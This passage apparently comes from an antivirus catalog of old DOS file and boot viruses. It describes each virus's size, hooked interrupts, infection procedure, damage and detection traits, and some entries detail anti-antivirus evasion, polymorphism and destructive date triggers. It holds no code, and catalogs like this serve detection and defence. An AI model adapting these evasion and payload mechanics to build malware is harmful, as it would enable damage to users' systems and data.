increase by 15395 bytes. [Pa-5220] Virus Name: Pa-5220 Virus Type: File Virus (EXE and COM files) Virus Length: Execution Procedure: Searches for an uninfected COM or EXE file on the current directory in A, B or C, then infects it. It only infects one file at a time. Damage: It overwrites the original files with the virus code, thus corrupting the files. Note: 1) Does not stay in the memory. 2) An error message appears when writing because INT 24h has not been hanged. 3) This virus was written using an advanced programming language. [PCBB-11] Virus Name: Pcbb11 Virus Type: File Virus (EXE and COM files) Virus Length: 3052 bytes PC Vectors Hooked: INT 21h, INT 24h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to prevent divulging its trace when writing. If the program to be executed is an uninfected COM or EXE file, the virus proceeds to infect it. Damage: Detection method: Infected files increase by 3052 bytes. [Bow] Virus Name: Bow Virus Type: File Virus (EXE and COM files) Virus Length: 5856 bytes PC Vectors Hooked: INT 21h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed is an uninfected COM or EXE file, the virus proceeds to infect it. Damage: None Note: 1) An error message appears when writing because INT 24h has not been hanged. 2) This virus was written using an advanced programming language. Detection Method: Infected files increase by 5856 bytes. [PCBB-3072] Virus Name: Pcbb3072 Virus Type: File Virus (EXE and COM files) Virus Length: 3,072 bytes PC vectors Hooked: INT 21h, INT 24h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to prevent divulging its trace when writing. If the program to be executed is an uninfected COM or EXE file, the virus proceeds to infect it. Damage: Detection Method: Infected files increase by 3072 bytes. [Terminal] Virus Name: Terminal Virus Type: File Virus (EXE and COM files) Virus Length: Execution Procedure: Searches for an uninfected EXE file on the current directory in C, then infects it. Damage: It overwrites the original files with the virus code, thus corrupting the files. Note: 1) Does not stay in the memory. 2) An error message appears when writing because INT 24h has not been hanged. 3) This virus was written using an advanced programming language. 4) This virus is encrypted by a program like PKLITE. Although it has a pattern, we were not able to scan it. [Lanc] Virus Name: Lanc Virus Type: File Virus (EXE files) Virus Length: 7,376 bytes Execution Procedure: 1) Searches for an uninfected EXE file on the current directory. 2) Creates a new COM file with the same file name as the original EXE file. This new COM file contains the virus. Damage: None Note: 1) Does not stay in the memory. 2) An error message appears when writing because INT 24h has not been hanged. 3) This virus was written using an advanced programming language. Detection method: Check whether the file length is 7376 bytes. [Nazi-Phobia] Virus Name: Nazi-Phobia Virus Type: File Virus (EXE files) Virus Length: Execution Procedure: Searches for an uninfected EXE file on the current directory, then infects it. It only infects one file at a time. Damage: It overwrites the original files with the virus code, thus corrupting the files. Note: 1) Does not stay in the memory. 2) An error message appears when writing because INT 24h has not been hanged. 3) This virus was written using an advanced programming language. [Animus] Virus Name: Animus Virus Type: File Virus (COM and EXE files) Virus Length: 7,360 or 7,392 bytes Execution Procedure: Searches for an uninfected COM or EXE file on the current directory, then infects it. It only infects two or three files at a time. Damage: None Note: 1) Does not stay in the memory. 2) An error message appears when writing because INT 24h has not been hanged. 3) This virus was written using an advanced programming language. Detection method: Infected files increase by 7360 or 7392 bytes. [Hitler] Virus Name: Hitler Virus Type: File Virus (COM files) Virus Length: 4,808 bytes PC Vectors Hooked: INT 21h, INT 24h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to prevent divulging its trace when writing. If the program to be executed is an uninfected COM file, the virus proceeds to infect it. Damage: None Detection method: Infected files increase by 4808 bytes. [Hellwean-1182] Virus Name: Hellwean1182 Virus Type: File Virus (EXE and COM files) Virus Length: 1182 bytes PC Vectors Hooked: INT 21h, INT 24h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to prevent divulging its trace when writing. If the program to be executed is an uninfected COM or EXE file, the virus proceeds to infect it. Damage: None Detection method: Infected files increase by 1182 bytes. [Minsk-GH] Virus Name: Minsk-Gh Virus Type: File Virus (EXE and COM files) Virus Length: 1450-1490 bytes PC Vectors Hooked: INT 21h, INT 24h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to prevent divulging its trace when writing. If the program to be executed is an uninfected COM or EXE file, the virus proceeds to infect it. Damage: None Note: This virus cannot run on DOS 5.0. Detection method: Infected files increase by 1450-1490 bytes. [LV] Virus Name: Lv Virus Type: File Virus (COM files) Virus Length: PC Vectors Hooked: INT 21h, INT 24h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and then checks whether COMMAND.COM that booted up the system is infected or not. If not, the virus infects it and returns to the original routine. Infection Procedure: 1) Hooks INT 21H (AH=4Bh) to infect files. First, it hangs INT 24h to prevent divulging its trace when writing. If the program to be executed is an uninfected COM file, the virus proceeds to infect it. Damage: It overwrites the original files with the virus code, thus corrupting the files. [Mini-207] Virus Name: Mini-207 Virus Type: File Virus (COM files) Virus Length: 207 bytes Execution Procedure: Searches for all uninfected COM files on the current directory, then infects them. Note: 1) Does not stay in the memory. 2) An error message appears when writing because INT 24h has not been hanged. Damage: It overwrites the original files with the virus code, thus corrupting the files. [Brother_300] Virus Name: Brother_300 Virus Type: File Virus (EXE files) Virus Length: 300 bytes PC Vectors Hooked: INT 21h, INT 24h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to prevent divulging its trace when writing. If the program to be executed is an uninfected EXE file, it creates a new COM file with the same name as the EXE file. This new COM file contains the virus. Its length is 300 bytes. Damage: None Detection method: Checks whether the file's length is 300 bytes. [Lip-286] Virus Name: Lip-286 Virus Type: File Virus (COM files) Virus Length: 286 bytes Execution Procedure: Searches for an uninfected COM file on the current directory, then infects it. It infects two or three files at a time. Damage: There is a flag in the virus procedure (every infected file has a different flag). The flag decreases by 1 every time the virus infects a file. When the flag reaches zero, the virus will destroy all data on the hard disk. Note: 1) Does not stay in the memory. 2) An error message appears when writing because INT 24h has not been hanged. Detection method: Infected files increase by 286 bytes. [Gomb] Virus Name: Gomb Virus Type: File Virus (COM files) Virus Length: 4093 bytes PC Vectors Hooked: INT 21h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed is an uninfected COM file, the virus proceeds to infect it. Damage: None Detection method: Infected files increase by 4093 bytes. [Bert] Virus Name: Bert Virus Type: File Virus (COM and EXE files) Virus Length: 2294 bytes PC Vectors Hooked: INT 21h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed is an uninfected COM or EXE file, the virus proceeds to infect it. Damage: None Detection method: Infected files increase by 2294 bytes. [Triple Shot] Virus Name: Triple-shot Virus Type: File Virus (EXE files) Virus Length: 6610 Execution Procedure: Searches for an uninfected EXE file on the current directory. Then creates a new hidden COM file with the same name as the EXE file. This new COM file is the virus. Its length is 6610 bytes. Damage: None Note: 1) Does not stay in the memory. 2) An error message appears when writing because INT 24h has not been hanged. Detection method: Check whether the file's length is 6610 bytes. [Fame] Virus Name: Fame Virus Type: File Virus (EXE files) Virus Length: 896 bytes PC Vectors Hooked: INT 21h, INT 24h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to prevent divulging its trace when writing. If the program to be executed is an uninfected EXE file, the virus proceeds to infect it. Damage: None Detection method: Infected files increase by 896 bytes. [CCCP] Virus Name: Cccp Virus Type: File Virus (COM files) Virus Length: 510 bytes Execution Procedure: Searches for an uninfected COM file on the current directory, then infects it. It infects two or three files at a time. Damage: There is a flag (valued 0 to 25) in the virus procedure (every infected file has a different flag). When an infected file with flag of 25 is executed, the virus will destroy all data on the hard disk. Note: 1) Does not stay in the memory. 2) An error message appears when writing because INT 24h has not been hanged. Detection method: Infected files increase by 510 bytes. [L1] Virus Name: L1 Virus Type: File Virus (COM files) Virus Length: 140 bytes PC Vectors Hooked: INT 21h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed is an uninfected COM file, the virus proceeds to infect it. Damage: None Note: An error message appears when writing because INT 24h has not been hanged. Detection method: Infected files increase by 140 bytes. [Crepate] Virus Name: Crepate Virus Type: File Virus Virus infects .COM between 400 and 62000 bytes, .EXE shorter than 589824 bytes. Virus is Memory Block Resident. Virus Length: 2910 bytes (file), 4K bytes (memory). Interrupt Vectors Hooked: INT 21h Infection Process: Every infected file becomes 2910 bytes longer, with the virus code at the end and some kind of a header created by the virus. The second group of bytes indicating the time of creation of the file, is set to 31 (1Fh). Every subsequent file infection, the virus resets the system memory from address 0:413 to 280h (640 K). Damage: Virus formats the hard disk. Symptoms: Loss of data stored in the last 7 sectors of the diskette, loss of data stored in the last cylinder, first side, first 7 sectors, increased file size. Note: This virus doesn't infect files named as : "*AN.???" or "*LD.???" To recognize the virus presence in the boot sector one can look for: - a byte valued FFh in the offset 4 in floppy disks. - a word valued 2128h in the offset 4 in hard disks. Furthermore, at the end of each infected file, a text string can be found: "Crepa (C) bye R.T.". This text can be easily modified. The DOS Chkdsk command, when the virus is resident, reveals a decrease of 4K bytes in the available memory. [Die Lamer] Virus Name: DIE LAMER Virus Type: Resident at the top of the MCB (Memory Control Block). Virus Length: 1,136 bytes Interrupt Vectors Hooked: INT 21h Infection Process: This virus is spread by executing an infected program. When a DIE LAMER infected program is executed, it will first check to see if it is already resident in the memory by checking if address 0:4f2h contains the value 3232h. If it is already in the memory it will execute the infected program. If not, it will perform the following functions: Damage: Loss of some data stored in the floppy. Symptoms: Garbage in floppy disk. Increased file sizes. Screen displays: "-=*@DIE_LAMER@*=-." Note: The method used by the virus is very dangerous, because if an anti-virus program catches this virus in the memory and displays the message: "found '-=*@DIE_LAMER@*=-' in memory", the virus will only write garbage to the floppy, but the virus program can be easily modified to execute more destructive routines (such as formatting the hard disk, etc...). [FaxFree] Virus Name: FAXFREE Virus Type: File Virus Virus infects .COM and .EXE files as long as they are longer than 32 bytes, and shorter than 131,072 bytes. Infects Partition record. File Virus. Virus Length: 3 Kb PC Vectors Hooked: INT 21h Infection Process: This virus can be spread by executing an infected program or from booting the system with an infected disk. There are several methods of infection. When an infected program is executed in a clean system, the virus first removes the contents of the original partition sector of the hard disk to the last sector of the last side of the last cylinder. Then the virus will copy itself in the last side of the last cylinder, beginning from the 9th last sector to the 6th last sector. These sectors are not marked as "bad sectors" and get overwritten by the virus, with no regards for their previous contents. Damage: Hangs the system. Infected files will increase in length by 2048 bytes, with the virus code file infection. Symptoms: When the virus wants to replace the original partition sector, it needs to decrypt some data which after decryption shows the following text strings : "PISello tenere fuori dalla portata dei bambini. PaxTibiQuiLegis.FaxFree!!" Note: This virus doesn't infect files named as : "*AN.???" , "*OT.???" or "*ND.???" If the system date is between the 25th and 30th of April, the virus will hang the system. The virus uses a smart technique to avoid anti-virus detection programs, when modifying the partition sector that is hooking int 01h, it will turn on a single step flag to get the original entry of DOS hooked. The virus will then move itself to the top of the MCB (Memory Control Block), and decrease available memory in the MCB by 3Kb. It will hook Int 13h and Int 21h and then run the original program. [Ghost Player] Virus Name: GHOST PLAYER Virus Type: File Virus (EXE files), Memory Block Resident Virus Length: 1,200 bytes PC Vectors Hooked: INT 21h Infection Process: This virus is spread by executing an infected program. When a GHOST PLAYER infected program is executed, if DOS version is greater than 3 and the serial number of default disk equals zero, virus will execute the infected program. Otherwise virus performs the following functions: virus stays resident at the top of the MCB (memory control block) but below the DOS 640k boundary. The available free memory will decrease by 1200 (4B0H) bytes. Damage: Virus increases file lengths. Symptoms: Decreased available memory. If a random value is equal to FF00, the virus displays the following message: " ! Bumpy" Furthermore, the screen shakes up and down. Note: The virus doesn't infect files named as : "TB*.???" , "F-*.???" , "CP*.???" , "NA*.???" , "SC*.???" "CL*.???" or "V*.???". [Gold Bug] Virus Name: GOLD-BUG Virus Type: Spawning Color Video Resident and Extended HMA Memory Resident Boot-Sector and Master-Sector Infector Virus Length: 1,024 Bytes Interrupt Vectors Hooked: INT 21h, INT 13h Infection Process: GOLD-BUG is a memory-resident multipartite polymorphic stealthing boot-sector spawning anti-antivirus virus that works with DOS 5 and DOS 6 in the HIMEM.SYS memory. When an .EXE program infected with the GOLD-BUG virus is run, it determines if it is running on an 80186 or better, if not it will terminate and not install. If it is on an 80186 or better it will copy itself to the partition table of the hard disk and remain resident in memory in the HMA (High Memory Area) only if the HMA is available, i.e., DOS=HIGH in the CONFIG.SYS file else no infection will occur. The old partition table is moved to sector 14 and the remainder of the virus code is copied to sector 13. The virus then executes the spawned associated file if present. INT 13 and INT 2F are hooked into at this time but not INT 21. The spawning feature of this virus is not active now. Damage: The GOLD-BUG virus also has an extensive anti-antivirus routine. It writes to the disk using the original BIOS INT 13 and not the INT 13 chain that these types of programs have hooked into. It hooks into the bottom of the interrupt chain rather than changing and hooking interrupts. If the GOLD-BUG virus is resident in memory, any attempts to run most virus scanners will be aborted. GOLD-BUG stops any large .EXE file (greater than 64k) with the last two letters of "AN" to "AZ". It will stop SCAN.EXE, CLEAN.EXE, NETSCAN.EXE, CPAV.EXE, MSAV.EXE, TNTAV.EXE, and so on. The SCAN program will either be deleted or an execution error will return. Also, GOLD-BUG will cause a CMOS checksum failure to happen the next time the system boots up. GOLD-BUG also erases "CHKLIST.???" created by CPAV.EXE and MSAV.EXE. Programs that do an internal checksum on themselves will not detect any changes. Symptoms: CMOS checksum failure. Creates files with no extension; Modem answers on 7th ring. Most virus scanners fail to run or are Deleted. And CHKLIST.??? files are deleted. Note: The GOLD-BUG virus is also Polymorphic. Each .EXE file it creates only has 2 bytes that remain constant. It can mutate into 128 different decryption patterns. It uses a double decryption technique that involves INT 3 that makes it very difficult to decrypt using a debugger. The assembly code allowed for 512 different front-end decryptors. Each of these can mutate 128 different ways. [Invisible Man] Virus Name: INVISIBLE MAN Virus Type: File Virus (COM and EXE files), Partition, Boot record, Memory Block Resident Virus Length: 2926 Bytes (file), D80h Bytes (memory) Interrupt Vectors Hooked: INT 21h Infection Process: This virus can spread by executing an infected program or by booting the system from an infected disk. There are several different methods of infection: (1). When an INVISIBLE MAN infected program is executed it will; A. Infect the hard disk partition table : (i) Write the virus body to the last 7 sectors of the active hard disk. (ii) The ending location of the active hard disk will be decreased by 7 sectors. (iii) Write the virus loader to the partition sector. This sector will be encrypted. B. Modify the boot sector: It will change the total sector numbers message, which will be seven less than the original figure. Damage: The virus displays a message and plays music on the system speaker. Symptoms: Loss of data stored in the last 7 sectors of the hard disk; increased file sizes. File sizes increase by 2926 bytes. Virus displays the following message: "I'm the invisible man, I'm the invisible man Incredible how you can See right through me." Virus also plays music on the system speaker. [Junkie] Virus Name: Junkie Virus Type: Memory-Resident Multipartite Virus Length: 512 bytes Interrupt Vectors Hooked: INT 21h Infection Process: Once a virus-infected program is run, the virus installs itself in the memory as a terminate-and-stay-resident program. On the system area of the hard disk, the virus copies two 512-byte sectors of code into the first track of the hard disk. The virus then modifies the existing master boot record of the hard disk to read the extra sectors and execute them upon boot-up. Damage: Virus adds approx. 1,024 bytes of virus code at the end of infected files. [March 25th] Virus Name: March-25th Virus Type: File Virus (EXE and COM files). The MARCH-25H virus will infect .COM and .EXE files which are shorter than 196608 Bytes in length. Virus Length: 1056 Bytes Interrupt Vectors Hooked: INT 21h Infection Process: This virus is spread by executing an infected program. When a MARCH-25H infected program is executed, it will check to see if it is already resident in the memory by checking if address 0:212h contains the value F100h. If it is already in the memory it will execute the infected program. Virus stays resident at the top of the MCB (memory control block) but below the DOS 640k boundary. The available free memory will decrease by 1056 (420H) bytes. It will infect .EXE and .COM programs when they are executed from the hard disk. Damage: The virus destroys the hard disk. Infected files will have a file length increase of 1025 - 1040 (401h - 410h) bytes with the virus being located at the end of the file. Symptoms: Virus causes data loss on the C drive. Note: If the system date is March 25 of any year, the virus will proceed to write garbage to: C drive sector 0 - 6 , cylinder 0 , head 0 C drive sector 1 - 7 , cylinder 1 , head 0 C drive sector 1 - 7 , cylinder 2 , head 0." [Minosse] Virus Name: MINOSSE Virus Type: File Virus (EXE files), MBR Virus Length: 5772 bytes PC Vectors Hooked: INT 21h Infection Process: MINOSSE is a polymorphic virus which prevents the Debug.exe program from tracing this virus. When a MINOSSE infected program is executed, it will; 1. Hook int 8xh - int 9xh: (x:any number) First, it will hook int 8xh - 9xh, and then it will run this interrupt to get into virus entry and decrypt the virus body. 2. Stay resident at the top of MCB (memory control block) but below the 640k DOS boundary. Damage: Virus will hang the system when the system date is greater than June and the day is the 25th. Infected programs will have a file length increase of 3075 bytes with the virus being located at the end of the file. The available free memory will decrease by 5772 bytes. Symptoms: Decreased available memory. Virus will display the following message, "Minose 1V5 (c) 93 WilliWonka." Note: This virus is a polymorphic and also a very smart virus. It is not easy to detect using scan programs because it doesn't have the same code for scanning, and it is not easy to find using the interrupt vectors because it recovers int 21h to the original vector. [Mombasa] Virus Name: MOMBASA Virus Type: File Virus (COM files) Virus Length: 3584 bytes PC Vectors Hooked: INT 21h, INT 08h Infection Process: MOMBASA is a polymorphic virus and uses INT 01h and INT 03h to prevent tracing this virus. When a MOMBASA infected program is executed, it will; Stay resident at the top of MCB (memory control block) but below the 640k DOS boundary. The available free memory will decrease by 3584 bytes. It will hook int 08h to detect if int 21h is changed by another program. If the INT 21h vector is changed, the virus will change it's vector to the new INT 21h vector and will hook its vector to int 21h again. It will infect .COM programs and try to infect C:\COMMAND.COM when they are executed. When MOMBASA is memory resident it will hide the file size change because the virus recovers the original file length. When creating a directory, removing a directory, or selecting a default drive such as A: or B:, the virus writes some data onto the disk/diskette, but without success. Damage: Screen slowly fades until completely blank. The system then proceeds to hang. Virus destroys the boot sector and FAT of the hard drive. Infected programs will have a file length increase of 3568 bytes with the virus being located at the end of the file. Symptoms: Virus displays the following message: "I'm gonna die...Attack radical...Mombosa virus (MM 92')." [NOV-17-768] Virus Name: NOV-17-768 Virus Type: File Virus (COM files shorter than 59920 Bytes, EXE) Virus Length: 768 Bytes (file), 800 Bytes (memory) PC Vectors Hooked: INT 21h Infection Process: This virus is a variant of the November-17th virus. The November 17th virus was detected in January, 1992. Its origin or point of original isolation was originally unknown, but it has since been reported as being widespread in Rome, Italy, during the month of December, 1991. November 17th is a memory resident infector of .COM and .EXE programs, including COMMAND.COM. The first time a program infected with November 17th is executed, the virus will install itself memory resident at the top of the system memory but below the 640K DOS boundary. Damage: Virus destroys current disk from sector 1 to sector 8. Total system and available free memory, as indicated by the DOS CHKDSK program, will decrease by 896 bytes. Interrupt 12's return will not have been moved. Interrupts 09 and 21 will be hooked. Symptoms: Infected programs will have a file length increase of 855 bytes with the virus being located at the end of the infected file. There will be no visible change to the file's date and time in a DOS disk directory listing Note: [NOV-17-800] Virus Name: NOV-17-800 Virus Type: File Virus (COM and EXE files), Memory Block Resident. Virus does not infect "SCAN", "CLEAN." Virus Length: 800 bytes (file), 832 bytes (memory) PC Vectors Hooked: INT 09h and 21h Infection Process: The first time a program infected with November 17th is executed, the virus will install itself memory resident at the top of the system memory but below the 640K DOS boundary. Damage: Virus destroys the hard disk's FAT. When the value of [00:46E] is changed and the month = 1, the virus will then write garbage onto the current disk from sectors 1 to 8. Symptoms: File sizes increase by 800 bytes. Decreased available memory by 800 bytes. [Protovir] Virus Name: PROTOVIR Virus Type: File Virus (COM files), resides in HiMem Virus Length: 730 bytes (file), 270 bytes (memory) PC Vectors Hooked: INT 21h Infection Process: Virus infects .COM programs when they are executed. Infected files will have a file length increase of 730 bytes with the virus being located at the end of the file. Virus updates the first 7 bytes, makes the file head point to the virus code, and reserves the first 7 bytes at the end of the infected file. Damage: Increased file sizes. Decreased available memory. Symptoms: Available free memory will decrease by 720 bytes. [Red Spider] Virus Name: RED SPIDER Virus Type: File Virus Virus infects .COM files that are between 2,000 (7D0H) and 63,500 (F80CH) bytes in length. Infect .EXE files that are smaller than 524,288 (80000H) byte. Virus is a Memory Block Resident. Virus Length: 949-964 bytes (file) PC Vectors Hooked: INT 21h Infection Process: Virus stays resident at the top of the MCB (memory control block) but below the DOS 640k boundary. Virus infects .EXE and .COM programs when they are executed. Infected files will have a file length increase of 949 - 964 bytes with the virus being located at the end of the file. Damage: Increased file sizes. Decreased available memory. Symptoms: The available free memory decreases by 976 bytes. Note: If COMMAND.COM is infected, the file length will not change. This virus will not infect. The following text strings can be found encrypted in the virus code: "Red Spider Virus created by Garfield from Zielona Gora in Feb 1993 ....... " [Hello Shshtay] Virus Name: HELLO-SHSHTAY Virus Type: File Virus Virus infects .COM files shorter than 63,776 bytes and .EXE files shorter than 52,428 bytes. Virus is a Memory Block Resident. Virus Length: 1,840-1,855 bytes (EXE), 1,600-1615 bytes (COM), 1792 bytes (memory) PC Vectors Hooked: INT 21h Infection Process: Virus stays resident at the top of the MCB (memory control block) but below the DOS 640k boundary. The available free memory decreases by 1792 bytes. Virus infects .EXE and .COM programs when they are executed. Infected .EXE files will have a file length increase of 1840-1855 bytes and infected .COM files will have a file length increase of 1600-1615 bytes with the virus being located at the end of the file in both cases. Damage: Increased file sizes. Decreased available memory. Symptoms: Virus displays the following messages: "HELLO SHSHTAY" "GODBYE AMIN " "HELLO SHSHTAY" " ZAGAZIG UNIV" Note: If the system date is greater than or equal to January, 1994, it will hook INT 1Ch, INT 09h and set a counter = 0. Interrupt 1ch will add one to the counter 18.2 times every second and when the counter is greater than or equal to 3786 (ECAh) it will trigger INT 09h and reset the counter back to 0. When Interrupt 09h is activated, it will put a message into the keyboard buffer, so around every 208 (3786/18.2) seconds, the screen will display one message in turn from the above list. [Star Dot] Virus Name: STARDOT Virus Type: File Virus (EXE files) Virus Length: 592-608 bytes (file) PC Vectors Hooked: INT 21h Infection Process: Virus only infects .EXE programs when they are executed. There will be a file length increase of 592 - 608 bytes with the virus being located at the end of the file. When the virus infects another clean program, it adds a counter and writes the value and virus body into a clean program, so the virus will get the day of the week and compare with the lowest 3 bits of the counter. If the values are equal, it will randomly destroy the current disk sector 8 times. If the counter value is equal to 63 (3Fh), it will send the random data to the system I/O port (from 380h to 3DFh). Damage: Virus destroys current disk sector and sends random data to the system I/O port. Symptoms: Data loss on the disk and increased file sizes. [Stunning Blow] Virus Name: STUNNING BLOW Virus Type: File Virus Virus infects .EXE files not starting with the following letters: "TB","F-","CP","NA","SC","CL","V." Virus is a Memory Block Resident. Virus Length: 1237 bytes (file), 1392 bytes (memory) PC Vectors Hooked: INT 21h Infection Process: This virus will activate on the 4, 8, 12, 16, 20, 24, and 28 of each month, after the initial delay period of one month. Upon activation the virus will: (1) Hook interrupt 08h, counter = FFD0h (2) Decrease the counter by 18.2 every second, and (3) When the counter reaches zero it will start to play music on the speaker. This virus also activates when a random seed = -1, and it will display the following message: " Stunning Blow (R) Ghost Player Italy." Damage: Virus deletes *.CPS files. Symptoms: Loss of some files named *.CPS and increased file sizes. Decreased available memory. [Sunrise] Virus Name: SUNRISE Virus Type: File Virus (EXE files) Virus Length: 1033 bytes (file), 80 bytes (memory) PC Vectors Hooked: INT 21h Infection Process: From the root directory of the current disk, the virus searches for the last subdirectory then changes to that subdirectory and all subsequent last subdirectories. The virus then searches to infect an uninfected *.EXE file. The virus checks the disk serial number. If the number is equal to zero and one memory word is equal to 2Dh, it will display the following message: "* Sun Rise * EpidemicWare G.I.P.Po oct-93." Interrupt 08h will be hooked: If the month when the executed file was infected is not equal to the current month, the virus will hook int 08h, which will: (i) Be resident at the top of the memory but below the 640k boundary. (ii) Decrease available memory by 80 bytes. (iii) Assign a value of BDD8h to a counter and decrease the counter by 18.2 every second. When the counter reaches zero the screen will blank out and the original screen contents will then scroll up. After this, the system returns to normal operation. (iv) Assign a value of 1518h to the counter and repeat steps (ii), (iii) and (iv). Damage: Virus hooks int 8h and at certain intervals the screen goes blank and scrolls up. Symptoms: Increased file sizes. Decreased available memory. [Thule] Virus Name: THULE Virus Type: File Virus Virus infects .COM files shorter than 61,054 bytes. Virus is a Memory Block Resident. Virus Length: 309 (COM files), 68 bytes (memory) PC Vectors Hooked: INT 21h Infection Process: This virus will move the virus code to 0:200h-0:243h and hook int 21h in order to delete a file named "THULE.COM." When DOS changes the current directory, it will try to open "THULE.COM" on the current directory. When found, this file will be deleted. Damage: The file named "THULE.COM" will be deleted. Symptoms: Increased file sizes. A file is deleted. [Topa 1.20] Virus Name: TOPA 1.20 Virus Type: File Virus Virus infects .COM files between 2712 and 60000 bytes. Infects .EXE files between 5424 and 524288 bytes. Virus is a Memory Block Resident. Virus Length: 2456-2471 bytes (EXE files), 2456 bytes (COM files), 5536 bytes (memory) PC Vectors Hooked: INT 1Ch, INT 21h Infection Process: This virus is spread by executing an infected program. When a TOPA_1.2 infected program is executed, it will check to see if AX= 4290h, INT 21 and return AX = 9047 indicate it is already resident in the memory. If it is, the virus will execute the infected program. If not, the virus will perform the following: 1) It will change memory allocate strategy to low memory last fit, then stay resident at the MCB (memory control block). The available free memory will decrease by 5536 (15A0H) bytes. 2) Once the TOPA_1.2 virus is memory resident, it will hook int 1Ch and int 21h in order to infect files. Damage: Decreased available memory. Symptoms: Increased file sizes. [Topo] Virus Name: TOPO Virus Type: File Virus Virus infects .EXE files shorter than 524288 bytes. Virus is a Memory Block Resident. Virus Length: 1536-1552 bytes (file), 3616 bytes (memory) PC Vectors Hooked: INT 21h Infection Process: This virus is spread by executing an infected program. When a TOPO infected program is executed, first it will hook INT 3 then use this interrupt to deceive the virus body. The virus will then check to see if it is already resident in the memory by checking if address 0:3feh contains the value 0011h. If the virus is already in the memory it will execute the infected program. The virus will not include files named: *AN.EXE and *LD.EXE, with "*" being a wild card. Damage: Virus destroys the diskette parameter (00:525h - 0:52Ch) and displays the following message: "R(etry), I(gnore), F(ail), or A(bort) ?" Symptoms: Increased file sizes and the inability to read certain files. Decreased available memory. Note: If the system date is equal to 25 or 26 of any month, the above message will appear. [Bloody Warrior] Virus Name: BLOODY-WARRIOR Virus Type: Resident at the top of the MCB (memory control block) Virus Length: 1344 bytes (file), 2768 bytes (memory) PC Vectors Hooked: Execution Procedure: The virus infects COM and EXE files as long as the COM file is smaller than EA60h bytes. It will not infect the following files: "SCAN", "STOP", "SHIELD", "CLEAN", "CV", "DEBUG", "TD." This virus can only spread by executing an infected program. Damage: The virus destroys the disk sector from sector 1 to 256. By progressive action: it will write garbage to the current disk from sectors 1 to 256 when it is the fourth or later in the month of July. Detection method: Infected files increase by 1344 bytes. Symptoms: When a BLOODY-WARRIOR infected program is executed it will be: 1. Resident at the top of the system memory but below the 640k DOS boundary. The available free memory will decrease by 2768 bytes. 2. Interrupt 21h will be hooked: When the BLOODY-WARRIOR virus is memory resident, in order to infect the files the virus will control the following functions: - loading and executing (AX=4B00h) - opening (AH=3Dh) - get and set file attribute (AH=43h) - rename a file (AH = 56h) It will infect EXE and COM files when they are executed, opened, when getting file attributes, or when renaming files. But it will not infect COM files if the length is greater than EA60h bytes. Infected programs will have a file length increase of 1344 bytes with the virus being located at the end of the file. If file header is : "SCAN","STOP", "SHIELD", "CLEAN", "CV", "DEBUG", or "TD" the virus will not infect these files but will instead restore int 21h to the original interrupt vector so these files will not be able to detect the virus. 3. This virus will only activate in July, when the date is the 4th or later. It will write garbage to the current disk from sectors 1 to 256. The garbage data includes the follow message" "Hello, world! I am the Bloody Warrior. Nice to meet you. What about this virus ? Funny ? There is no hope for you. This virus was released in Milan 1993." Note: There is a possibility of detection when using DOS commands. [17690] Virus Name: 17690 Virus Type: File Virus (EXE files) Virus Length: 17,690 bytes Execution Procedure: 1) There is a 10% chance that the virus will infect a file. The method of infection is: virus searches for an EXE file on diskette A. Then renames this file and creates a new COM file with the same name as the original EXE file. This new COM file is the virus. 2) When the virus does not infect files, it will execute the program that has been renamed. User will not see any unusual manifestation. Damage: None Detection method: Infected files increase by 17,690 bytes. [Fish 1100] Virus Name: Fish-1100 Virus Type: File Virus (COM files) Virus Length: 1100 bytes PC Vectors Hooked: INT 21h, INT 24h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to prevent divulging its trace when writing. If the program to be executed is an uninfected COM file, the virus proceeds to infect it. Damage: None Detection method: Infected files increase by 1100 bytes. [Fish 2420] Virus Name: Fish-2420 Virus Type: File Virus (COM files) Virus Length: 2420 bytes PC Vectors Hooked: INT 21h, INT 24h Execution Procedure: 1) Checks whether it is memory resident. If not, it loads itself resident in the high memory. 2) Hooks INT 21h and goes back to the original routine. Infection Procedure: 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to prevent divulging its trace when writing. If the program to be executed is an uninfected COM file, the virus 